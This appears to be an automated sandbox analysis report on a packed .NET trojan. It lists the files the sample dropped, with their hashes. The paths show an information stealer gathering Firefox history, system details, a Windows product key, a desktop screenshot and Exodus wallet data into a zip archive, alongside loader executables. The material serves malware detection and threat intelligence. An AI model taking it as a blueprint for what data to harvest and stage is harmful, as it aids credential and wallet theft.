C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ez5ghfow.v2o.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hped3tno.xxs.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqn0ny0z.atb.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfe5zsne.wim.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\ce3ed400-d1e84918ad678b08d2a369a3-Latest.log	ASCII text	08417E9E59F703DC7CA2F98260B6F51F	0D2BF83E7D0B59F44759277842E7781D1E0B3B3C	D537581369D0F9464187306B9570A62C6A57D7B289E6584BBCA0C72FE20BEB13
C:\Users\user\AppData\Local\Temp\tmp5D77.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	429F49156428FD53EB06FC82088FD324	560E48154B4611838CD4E9DF4C14D0F9840F06AF	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
C:\Users\user\AppData\Local\Temp\tmp5DD6.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Temp\tmp5DD7.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\Users\user\AppData\Local\Temp\tmp5DE8.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\Users\user\AppData\Local\Temp\tmp5E08.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	429F49156428FD53EB06FC82088FD324	560E48154B4611838CD4E9DF4C14D0F9840F06AF	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
C:\Users\user\AppData\Local\Temp\tmp5E28.tmp.dat	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	D2A38A463B7925FE3ABE31ECCCE66ACA	A1824888F9E086439B287DEA497F660F3AA4B397	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
C:\Users\user\AppData\Local\Temp\tmp5F43.tmp.dat	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\Users\user\AppData\Local\Temp\tmp5FC1.tmp.dat	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	D2A38A463B7925FE3ABE31ECCCE66ACA	A1824888F9E086439B287DEA497F660F3AA4B397	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
C:\Users\user\AppData\Local\Temp\tmpA77.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	9D46F142BBCF25D0D495FF1F3A7609D3	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
C:\Users\user\AppData\Local\Temp\tmpAA25.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	429F49156428FD53EB06FC82088FD324	560E48154B4611838CD4E9DF4C14D0F9840F06AF	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
C:\Users\user\AppData\Local\Temp\tmpAB7.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\Users\user\AppData\Local\Temp\tmpABDC.tmp.dat	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat	DOS batch file, ASCII text, with CRLF line terminators	66C56EC8C80ED1F5484BA45B861BB7F0	355E2791C039EE2F347B4AC13820D52E525B9EAB	928C93BCBC2DF062541B03FB48BA9C039C27F323893713E311D198D63D7E1EF5
C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat	DOS batch file, ASCII text, with CRLF line terminators	13DD23CEB577D0E355382A4C3669E993	D5AB5C9CAD750573B7D65175087E496BDABBC046	D8B6BB1E9D154A17D5107B0151AE7005946CDBA5EA216F3D7EE005DB116C141B
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\DotNetZip-zvrymdq1.tmp	Zip archive data, at least v2.0 to extract, compression method=store	746030818E79376B6E81F24D810A17DE	875BBFCCF980139AD7495AEAF9684084EB67910B	38A0C2D270E76C9025EEC1CBA7A5599C1E9F26AF84179BA960796B960C0A7E8E
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH.zip (copy)	Zip archive data, at least v2.0 to extract, compression method=store	746030818E79376B6E81F24D810A17DE	875BBFCCF980139AD7495AEAF9684084EB67910B	38A0C2D270E76C9025EEC1CBA7A5599C1E9F26AF84179BA960796B960C0A7E8E
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Browsers\Mozilla\Firefox\Bookmarks.txt	ASCII text	2E9D094DDA5CDC3CE6519F75943A4FF4	5D989B4AC8B699781681FE75ED9EF98191A5096C	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Browsers\Mozilla\Firefox\History.txt	Unicode text, UTF-8 text	61CDD7492189720D58F6C5C975D6DFBD	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Directories\OneDrive.txt	ASCII text, with CRLF line terminators	966247EB3EE749E21597D73C4176BD52	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Directories\Startup.txt	ASCII text, with CRLF line terminators	68C93DA4981D591704CEA7B71CEBFB97	FD0F8D97463CD33892CC828B4AD04E03FC014FA6	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Desktop.jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3	906640AEE55936F89DB35CB77EC28733	62533CEB7E44F62692E101D0DF697038A0D6FAA4	6A9FF87505395ECBD93E6CF1421A82698B682BE68756ADA1F4F766991DE92A7B
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Info.txt	ASCII text	961F202A8DEBB80B5E7E05EA452DB203	1A146821B84A7C7EB2EE776F144FAD5BA0743B45	45FC3765E419E466DC8EA05A71AF360B72923BD04537F0ADCF7D372B3DB9BCC1
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Process.txt	ASCII text	93AC0064E5D10DB8F1EF22327FBED7E7	CD6C78AA5F426B01A7626B67E25212A6F2174C91	78B77067E1FC4BABAB4D21D551C4D7FC7F99CC35D97F6C3F5D86F279FF150652
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\ProductKey.txt	ASCII text, with no line terminators	E62D6B5E8737B2880337BD3568B3230C	564C9791260A7C120DFAA89CF1D5E858B9DBD661	9A1DBF2FF1AD76BBF36DE0DF7B6B23DCD098F648FCE94ABB65B8B95A32118FC6
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\System\Windows.txt	ASCII text	0EDFA710467E8FD7EE7FEC6451B0EBA7	1F5C39A7A5B0E2E3B3290C0ED5EC243F0AD32ACE	63F868D4F08EF3A4626D1D66B3F1B554C0F101714492128B3A9812F194A9F5BB
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\CURRENT	ASCII text	46295CAC801E5D4857D09837238A6394	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\LOG	ASCII text	6B9F5B8743F68BCE7EC2C3C5550E37E2	DFB609C9CBFCA8CCA3EF409DE9E1BE1699AE5C51	422C5727958B56FCAF5F4097F10EF8DE06A46952261EBEDBB96C1AACADD8D693
C:\Users\user\AppData\Local\ffeedba2cefa4bd6fcc1805b6a21bd51\user@965969_en-CH\Wallets\Edge_Wallet\Edge_Exodus\MANIFEST-000001	OpenPGP Secret Key	5AF87DFD673BA2115E2FCF5CFDB727AB	D5B5BBF396DC291274584EF71F444F420B6056F1	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
C:\Users\user\AppData\Roaming\Loaader.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	B8D455465260A845DB35492FDA5A8888	287B0BA049AD8F3BE802D2224EFB86DBA72D3221	A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
C:\Users\user\AppData\Roaming\Loader.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	7AC0ADF482250172280DEFEC7A7054DA	20A25F0DA68C309D062C4628EAD8B6F377AC7969	3CAA5F06008365FBECF46198744793C36C42309B49A6324BEBE8123BE10F87D5
C:\Users\user\AppData\Roaming\MyData\DataLogs.conf	ASCII text	CF759E4C5F14FE3EEC41B87ED756CEA8	C27C796BB3C2FAC929359563676F4BA1FFADA1F5	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	55B4912FDF29FD977C565B786754FA09	90911E46153857FDEE68370FF178C53A40F2F49E	22E93AAB01F44043722BC70B9A20CBEE117071564301AAF89AF67D443453D2F2
\Device\Null	ASCII text, with CRLF line terminators, with overstriking	3DD7DD37C304E70A7316FE43B69F421F	A3754CFC33E9CA729444A95E95BCB53384CB51E4	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA

Windows Analysis Report SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Malware Threat Intel
Provided by